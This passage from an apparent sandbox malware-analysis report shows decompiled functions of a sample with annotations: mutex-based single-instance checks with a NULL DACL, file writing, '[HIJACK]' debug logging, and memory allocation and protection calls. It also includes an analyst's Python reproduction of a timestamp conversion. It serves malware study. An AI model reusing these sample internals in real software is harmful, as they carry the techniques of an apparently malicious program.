                                                                                                                                                                           • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Time$CloseFileInfoOpenQuerySystem__aulldiv
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3147484438-0
                                                                                                                                                                          • Opcode ID: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
                                                                                                                                                                          • Instruction ID: 6ac3f46dae9d66049611ff428ba7790207c0dca18eda03b4da7369df6ee0e458
                                                                                                                                                                          • Opcode Fuzzy Hash: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
                                                                                                                                                                          • Instruction Fuzzy Hash: 6D21FC75E10208ABEB00CFD4C898FEEB7B9FF48704F108548E514BB290D7B59A45CBA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                          			E1001F3D0(char* _a4) {
                                                                                                                                                                          				struct _SYSTEMTIME _v20;
                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                                                                                          				struct _FILETIME _v36;
                                                                                                                                                                          				struct _FILETIME _v44;
                                                                                                                                                                          				struct _FILETIME _v52;
                                                                                                                                                                          				struct _FILETIME _v60;
                                                                                                                                                                          				void* _v64;
                                                                                                                                                                          				int _t28;
                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _t44;
                                                                                                                                                                          
                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                           				_t28 = PathFileExistsA(_a4); // executed
                                                                                                                                                                           				if(_t28 != 0) {
                                                                                                                                                                           					_v64 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x2000000, 0); // GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS (also opens directories)
                                                                                                                                                                           					if(_v64 != 0xffffffff && GetFileTime(_v64,  &_v36,  &_v44,  &_v52) != 0) { // _v36 = creation, _v44 = last access, _v52 = last write time
                                                                                                                                                                           						_v20.wYear = 0x7b2; // 1970-01-01 00:00:00: the Unix epoch as a SYSTEMTIME
                                                                                                                                                                           						_v20.wMonth = 1;
                                                                                                                                                                           						_v20.wDay = 1;
                                                                                                                                                                           						_v20.wHour = 0;
                                                                                                                                                                           						_v20.wMinute = 0;
                                                                                                                                                                           						_v20.wSecond = 0;
                                                                                                                                                                           						_v20.wMilliseconds = 0;
                                                                                                                                                                           						SystemTimeToFileTime( &_v20,  &_v60); // _v60 = epoch as FILETIME (100 ns ticks since 1601-01-01)
                                                                                                                                                                           						_t44 = _v36.dwLowDateTime - _v60.dwLowDateTime; // 64-bit subtraction, low dword: creation time minus epoch
                                                                                                                                                                           						asm("sbb eax, [ebp-0x34]"); // high dword with borrow from the low-dword subtraction
                                                                                                                                                                           						_v28 = E1000F290(_t44, _v36.dwHighDateTime, 0x2710, 0); // E1000F290 is __aulldiv: divide by 0x2710 = 10000, giving milliseconds since 1970 (low dword)
                                                                                                                                                                           						_v24 = _t44; // high dword of the quotient
                                                                                                                                                                           					}
                                                                                                                                                                           					// Note: the handle in _v64 is not closed in this function (no CloseHandle in the API list below)
                                                                                                                                                                           				}
                                                                                                                                                                          			}
                                                                                                                                                                           Addresses
                                                                                                                                                                           • 0x1001f3d6, 0x1001f3dd, 0x1001f3e8, 0x1001f3f0, 0x1001f412, 0x1001f419, 0x1001f435, 0x1001f43b, 0x1001f441, 0x1001f447, 0x1001f44d, 0x1001f453, 0x1001f459, 0x1001f467, 0x1001f470, 0x1001f476, 0x1001f487, 0x1001f48a, 0x1001f48a, 0x1001f419, 0x1001f496

                                                                                                                                                                          APIs
                                                                                                                                                                          • PathFileExistsA.KERNELBASE(?), ref: 1001F3E8
                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 1001F40C
                                                                                                                                                                          • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 1001F42B
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F467
                                                                                                                                                                          • __aulldiv.LIBCMT ref: 1001F482
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                           • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Time$CreateExistsPathSystem__aulldiv
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3038978132-0
                                                                                                                                                                          • Opcode ID: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
                                                                                                                                                                          • Instruction ID: 94f5442095f36b7f33c28a28e912268f677076f0b3d524be3b20220ad1e1facd
                                                                                                                                                                          • Opcode Fuzzy Hash: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
                                                                                                                                                                          • Instruction Fuzzy Hash: 9A21E875A10208ABEB00DFD4D899FEEB7B8EF08704F108608E505BB290D775A685CBA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%
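Both decompiled functions above (the RegQueryInfoKeyA caller and E1001F3D0) apply the same timestamp normalisation: build the FILETIME for 1970-01-01 with SystemTimeToFileTime, subtract it from a queried FILETIME as a 32-bit sub/sbb pair, and divide by 0x2710 with __aulldiv, which turns 100 ns ticks into milliseconds since the Unix epoch. The Python below is an added analyst's reproduction of that arithmetic, not code from the sample or from this report; it runs offline without the Win32 API by deriving the epoch FILETIME from the calendar, and the 2021-01-21 timestamp used in the usage line is a constructed example value.

```python
"""Reproduce the FILETIME -> milliseconds-since-1970 conversion seen in the
decompiled code: SystemTimeToFileTime(1970-01-01), a sub/sbb 64-bit
subtraction and an __aulldiv by 0x2710 (10000)."""
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)  # FILETIME zero point
TICKS_PER_SECOND = 10_000_000  # FILETIME counts 100 ns intervals
MASK32 = 0xFFFFFFFF


def systemtime_to_filetime(year, month, day, hour=0, minute=0, second=0, ms=0):
    """Mimic SystemTimeToFileTime: 100 ns ticks since 1601-01-01 UTC."""
    dt = datetime(year, month, day, hour, minute, second, ms * 1000, tzinfo=timezone.utc)
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def split_filetime(ticks):
    """Return (dwLowDateTime, dwHighDateTime) as the FILETIME struct stores them."""
    return ticks & MASK32, (ticks >> 32) & MASK32


def sub_with_borrow(low_a, high_a, low_b, high_b):
    """The sub/sbb pair from the listing: low = low_a - low_b,
    high = high_a - high_b - borrow, both wrapped to 32 bits."""
    low = (low_a - low_b) & MASK32
    borrow = 1 if low_a < low_b else 0
    high = (high_a - high_b - borrow) & MASK32
    return low, high


def filetime_to_unix_ms(low, high):
    """What the sample computes: (FILETIME - FILETIME(1970-01-01)) / 0x2710.
    __aulldiv is an unsigned 64-bit divide, so the dword pair is rejoined first."""
    epoch_low, epoch_high = split_filetime(systemtime_to_filetime(0x7B2, 1, 1))  # wYear 0x7b2 = 1970
    dlow, dhigh = sub_with_borrow(low, high, epoch_low, epoch_high)
    delta_ticks = (dhigh << 32) | dlow
    return delta_ticks // 0x2710  # 10000 ticks of 100 ns = 1 ms


def unix_ms_to_datetime(ms):
    """Inverse helper for the analyst: turn the sample's value back into a UTC time."""
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(milliseconds=ms)


if __name__ == "__main__":
    # Constructed example: a file created 2021-01-21 12:00:00 UTC.
    low, high = split_filetime(systemtime_to_filetime(2021, 1, 21, 12))
    ms = filetime_to_unix_ms(low, high)
    print(hex(systemtime_to_filetime(1970, 1, 1)), ms, unix_ms_to_datetime(ms))
```

The epoch FILETIME the sample obtains from SystemTimeToFileTime is the well-known constant 116444736000000000 (134774 days between 1601-01-01 and 1970-01-01), so when the same value turns up in a config or a C2 message it is a millisecond timestamp, not a Unix seconds value: divide by 1000 before passing it to ordinary epoch converters.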

                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                          			E1001A740(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                          				char _v8;
                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                          				char _v279;
                                                                                                                                                                          				char _v280;
                                                                                                                                                                          				intOrPtr _v284;
                                                                                                                                                                          				char _v312;
                                                                                                                                                                          				signed int _v316;
                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                          				void* _t27;
                                                                                                                                                                          				intOrPtr _t52;
                                                                                                                                                                          				void* _t55;
                                                                                                                                                                          
                                                                                                                                                                          				_t51 = __esi;
                                                                                                                                                                          				_t50 = __edi;
                                                                                                                                                                          				_t37 = __ebx;
                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                          				_push(E10022AB3);
                                                                                                                                                                          				_push( *[fs:0x0]);
    *[fs:0x0] = _t52;
    _v316 = 0;
    E10001160( &_v312, __eflags, 0x10024c8f);
    _v8 = 0;
    _v280 = 0;
    E1000CF20(__edi,  &_v279, 0, 0x103);
    E1001DC00(__ebx, _t50, __esi,  &_v280); // executed
    _t46 =  &_v280;
    _t27 = E1000CAC0( &_v280);
    _t55 = _t52 - 0x12c + 0x10;
    _t59 = _t27;
    if(_t27 == 0) {
        E1000D8A3( &_v280,  &_v280, 0x104, "unknown err");
        _t55 = _t55 + 0xc;
    }
    _v284 = E1001A480(_t37, _t46, _t50, _t51, _t59,  &_v280);
    E100011C0( &_v312, _v284);
    _push(_v284);
    E1000CA30(_t37, _t50, _t51, _t59);
    E10001110(_a4, _t59,  &_v312);
    _v316 = _v316 | 0x00000001;
    _v8 = 0xffffffff;
    E100011A0( &_v312);
    *[fs:0x0] = _v16;
    return _a4;
}

APIs
• _memset.LIBCMT ref: 1001A794
  • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC28
  • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC45
  • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC5B
  • Part of subcall function 1001DC00: GetVersionExW.KERNEL32(00000114), ref: 1001DC74
  • Part of subcall function 1001DC00: _strcpy_s.LIBCMT ref: 1001DDA9
• _strlen.LIBCMT ref: 1001A7AF
• _strcpy_s.LIBCMT ref: 1001A7CC
Strings
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: _memset$_strcpy_s$Version_strlen
• String ID: unknown err
• API String ID: 3541540748-813478822
• Opcode ID: 1afc326e267b248bed630016db321b3469e2e1c022afc86cb818c24d622b85b2
• Instruction ID: 908e89cf5b9352ff889f1a9c3fa8eeef98413c65ec874cc1b061f0950b8e6722
• Opcode Fuzzy Hash: 1afc326e267b248bed630016db321b3469e2e1c022afc86cb818c24d622b85b2
• Instruction Fuzzy Hash: 6F214FB5C0021CABDB28DB54DD82BD9B774EB04754F4041D4B609A7285EB74BB84CFD2
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID: gD
• API String ID: 0-3208440949
• Opcode ID: 111f43c56742ec638a572f82f5ca4ec6e7bdecaa892b65ee4401de1ac2a03f5a
• Instruction ID: 6957e882798c71108725babcfdfb57a72852dd80e4b54c1f9a550367692d2ec8
• Opcode Fuzzy Hash: 111f43c56742ec638a572f82f5ca4ec6e7bdecaa892b65ee4401de1ac2a03f5a
• Instruction Fuzzy Hash: C561FBB4E00209EFDB04CF94C885AAEBBB5FF49314F108159EA05AB385D774E981CFA5
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
E1001A0F0(CHAR* _a4) {
    struct _SECURITY_DESCRIPTOR _v24;
    int _v28;
    struct _SECURITY_ATTRIBUTES _v40;
    int _v44;
    void* _t19;

    _v44 = 0;
    _v28 = 0;
    // NULL DACL: the mutex is created with no access restrictions
    InitializeSecurityDescriptor( &_v24, 1);
    SetSecurityDescriptorDacl( &_v24, 1, 0, 0);
    _v40.nLength = 0xc;
    _v40.bInheritHandle = 1;
    _v40.lpSecurityDescriptor =  &_v24;
    _t19 = CreateMutexA( &_v40, 0, _a4); // executed
    _v28 = _t19;
    // 0xb7 == ERROR_ALREADY_EXISTS: another instance already holds the named mutex
    if(_v28 != 0 && GetLastError() == 0xb7) {
        _v44 = 1;
    }
    return _v44;
}

APIs
• InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1001A10A
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 1001A11A
• CreateMutexA.KERNELBASE(0000000C,00000000,10020584), ref: 1001A13E
• GetLastError.KERNEL32 ref: 1001A14D
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
• String ID:
• API String ID: 4085719312-0
• Opcode ID: 85a6fd12354dd419dd0ef30a81820dc56bd3bdf0a7a4bd4704583f47520dfa93
• Instruction ID: 94a843d0d969dde2b410f28b1faa04b0eb5ecf9004c44cc09fbfa4c27db3ef7e
• Opcode Fuzzy Hash: 85a6fd12354dd419dd0ef30a81820dc56bd3bdf0a7a4bd4704583f47520dfa93
• Instruction Fuzzy Hash: 5A01BF70900309DFEB10DF90C999BDEBBB4EB08705F604504E605B6290D7B59A85CBB5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• VirtualProtect.KERNELBASE(00000000,00000000,?,?), ref: 00446E6F
Strings
Memory Dump Source
• Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                          • String ID: $@
                                                                                                                                                                          • API String ID: 544645111-1077428164
                                                                                                                                                                          • Opcode ID: f624bd3e15cca0fcb456706e8e4389966f128c157dc993db58a64aaca4871b9e
                                                                                                                                                                          • Instruction ID: 8c9fb8b25dea0f64debf4677d765020c59aa98c8a67f05ebdda8bc8d20a2195e
                                                                                                                                                                          • Opcode Fuzzy Hash: f624bd3e15cca0fcb456706e8e4389966f128c157dc993db58a64aaca4871b9e
                                                                                                                                                                          • Instruction Fuzzy Hash: 1C51F7B4A00219DFDB08CF88C590BEDBBF2FB89314F249259E405AB391D735A985CF95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000065,00000000,00001000,00000004,?,00446957,?,?), ref: 00446CD4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                          • String ID: WiD$WiD
                                                                                                                                                                          • API String ID: 4275171209-2059140455
                                                                                                                                                                          • Opcode ID: 06d134ac31ed49927b0023594b9de14bb7f4387dc246311e3687aa03bac033bc
                                                                                                                                                                          • Instruction ID: 8eda7cecab3c74c8236272e2eafc45d947fea4a728d29e80eeada1299ec75620
                                                                                                                                                                          • Opcode Fuzzy Hash: 06d134ac31ed49927b0023594b9de14bb7f4387dc246311e3687aa03bac033bc
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C41CCB4A00209DFDB08CF88D991EAEB7B5FF48304F208159E915AB355D734EE51CBA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

C-Code - Quality: 73%
E1000CE64(void* __edx) {
	void* __ebx;
	void* __edi;
	void* __esi;
	intOrPtr _t1;
	void* _t2;
	void* _t6;
	void* _t10;
	void* _t12;
	void* _t18;
	void* _t20;
	void* _t22;
	intOrPtr _t24;
	void* _t28;
	void* _t30;
	void* _t32;
	void* _t37; // used below (L19 and L16) but missing from the decompiler's declarations; added here

	_t18 = __edx;
	_t12 = HeapAlloc;
	do {
		_t32 =  *0x10333310; // 0xc00000
		_t20 = _t30;
		// global at 0x10333310 is zero: run the three setup routines before the first allocation
		if(_t32 == 0) {
			E100119E6(_t12, _t18, _t20, _t32);
			E10011846(0x1e);
			E100115A8(0xff);
		}
		// mode selector at 0x10335f3c: 1 and 3 take different allocation paths, anything else rounds the size up to 16
		_t1 =  *0x10335f3c;
		if(_t1 != 1) {
			__eflags = _t1 - 3;
			if(__eflags != 0) {
				L10:
				__eflags = _t30;
				if(_t30 == 0) {
					_t20 = 1;
					__eflags = 1;
				}
				_t22 = _t20 + 0x0000000f & 0xfffffff0;
				__eflags = _t22;
				_push(_t22);
				goto L13;
			} else {
				_push(_t30);
				_t2 = E1000CE07(_t12, _t20, 0, __eflags);
				__eflags = _t2;
				if(__eflags == 0) {
					goto L10;
				}
			}
		} else {
			if(_t30 == 0) {
				_t10 = 1;
				__eflags = 1;
			} else {
				_t10 = _t30;
			}
			_push(_t10);
			L13:
			_push(0);
			_t2 = RtlAllocateHeap( *0x10333310); // executed; pushed values above are the remaining arguments
		}
		_t28 = _t2;
		if(_t28 == 0) {
			_t24 = 0xc; // stored through E1000F720 when the allocation returned NULL
			if( *0x103337d4 == _t2) {
				 *((intOrPtr*)(E1000F720(__eflags))) = _t24;
				L19:
				 *((intOrPtr*)(E1000F720(_t37))) = _t24;
			} else {
				goto L16;
			}
		}
		return _t28;
		L16:
		_t6 = E100108CA(_t30); // retry the whole allocation while this call returns non-zero
		_t37 = _t6;
	} while (_t6 != 0);
	goto L19;
}
                                                                                                                                                                          0x1000ced4
                                                                                                                                                                          0x1000cede
                                                                                                                                                                          0x1000cedf
                                                                                                                                                                          0x1000cef3
                                                                                                                                                                          0x1000cef5
                                                                                                                                                                          0x1000cefa
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000cedf
                                                                                                                                                                          0x1000cf02
                                                                                                                                                                          0x1000cee1
                                                                                                                                                                          0x1000cee2
                                                                                                                                                                          0x1000cee7
                                                                                                                                                                          0x1000cee9
                                                                                                                                                                          0x00000000

APIs
• __FF_MSGBANNER.LIBCMT ref: 1000CE79
  • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A0D
  • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A17
• __NMSG_WRITE.LIBCMT ref: 1000CE80
  • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118B2
  • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 100118C3
  • Part of subcall function 10011846: GetModuleFileNameA.KERNEL32(00000000,103334D9,00000104,?,103332E0,00000000), ref: 100118DF
  • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118F4
  • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 10011907
  • Part of subcall function 10011846: _strlen.LIBCMT ref: 10011910
  • Part of subcall function 10011846: _strlen.LIBCMT ref: 1001191D
  • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 1001194A
  • Part of subcall function 100115A8: ___crtCorExitProcess.LIBCMT ref: 100115AC
  • Part of subcall function 100115A8: ExitProcess.KERNEL32 ref: 100115B6
  • Part of subcall function 1000CE07: ___sbh_alloc_block.LIBCMT ref: 1000CE2F
• RtlAllocateHeap.NTDLL(00000000), ref: 1000CECE
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$AllocateFileHeapModuleName___crt___sbh_alloc_block
• String ID:
• API String ID: 3791426274-0
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E1001FC10(CHAR* _a4, void* _a8, long _a12) {
	void* _v8;
	long _v12;
	struct _OVERLAPPED* _v16;
	void* _t12;
	int _t14;

	_v16 = 0;
	_t12 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0); // executed
	_v8 = _t12;
	_t14 = WriteFile(_v8, _a8, _a12,  &_v12, 0); // executed
	if(_t14 != 0) {
		_v16 = 1;
	}
	CloseHandle(_v8);
	return _v16;
}


APIs
• CreateFileA.KERNELBASE(10026888,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC33
• WriteFile.KERNELBASE(00039E00,00000000,00000000,10026888,00000000), ref: 1001FC4E
• CloseHandle.KERNEL32(00039E00), ref: 1001FC63
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID:
• API String ID: 1065093856-0
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E1001F1C0() {
	int _t1;

	_t1 = PathFileExistsA("C:\\hijack"); // executed
	return _t1;
}


APIs
• PathFileExistsA.KERNELBASE(C:\hijack,?,1001F1E2,?,100227A9,[HIJACK][%s][%s][%d]: data = %s,00000000), ref: 1001F1C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: ExistsFilePath
• String ID: C:\hijack
• API String ID: 1174141254-148195797
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E1001F1D0(void* __edi, intOrPtr _a4, char _a8) {
	char* _v8;
	char _v70491;
	char _v70492;
	void* _t12;
	void* _t16;

	E10018AA0(0x11358); // executed
	_t12 = E1001F1C0(); // executed
	if(_t12 != 0) {
		_v70492 = 0;
		E1000CF20(__edi,  &_v70491, 0, 0x1134f);
		_v8 =  &_a8;
		_t16 = E10001D10( &_v70492, 0x1134f, _a4, _v8);
		_v8 = 0;
		OutputDebugStringA( &_v70492);
		return _t16;
	}
	return _t12;
}

APIs
• Part of subcall function 1001F1C0: PathFileExistsA.KERNELBASE(C:\hijack,?,1001F1E2,?,100227A9,[HIJACK][%s][%s][%d]: data = %s,00000000), ref: 1001F1C8
• _memset.LIBCMT ref: 1001F1FB
• Part of subcall function 10001D10: __vsnprintf_s.LIBCMT ref: 10001D27
• OutputDebugStringA.KERNEL32(?,?,?,?,?,100227A9,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F233
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: DebugExistsFileOutputPathString__vsnprintf_s_memset
• String ID:
• API String ID: 3726070730-0
• Opcode ID: 2524b0902bb6863752e16d8784e8157a0219e7e2b3e8697a48ef5fbb85983224
• Instruction ID: d1c4eaeef2fe96386540b73fb7cae86f07877a9616b03c9c3f3d83701942bdc8
• Opcode Fuzzy Hash: 2524b0902bb6863752e16d8784e8157a0219e7e2b3e8697a48ef5fbb85983224
• Instruction Fuzzy Hash: DDF09079900348B7DB48DBE5DC46FE9B37EDB04A00F5440C9FA1897649EA70F7848BA2
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
E1000F7BF(intOrPtr _a4) {
	void* _t6;
	intOrPtr _t7;
	void* _t10;

	_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
	 *0x10333310 = _t6;
	if(_t6 != 0) {
		_t7 = E1000F764(__eflags);
		__eflags = _t7 - 3;
		 *0x10335f3c = _t7;
		if(_t7 != 3) {
			L5:
			__eflags = 1;
			return 1;
		} else {
			_t10 = E1000FA34(0x3f8);
			__eflags = _t10;
			if(_t10 != 0) {
				goto L5;
			} else {
				HeapDestroy( *0x10333310);
				 *0x10333310 =  *0x10333310 & 0x00000000;
				goto L1;
			}
		}
	} else {
		L1:
		return 0;
	}
}

APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000,1000E9AF,00000001), ref: 1000F7D0
• HeapDestroy.KERNEL32 ref: 1000F806
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
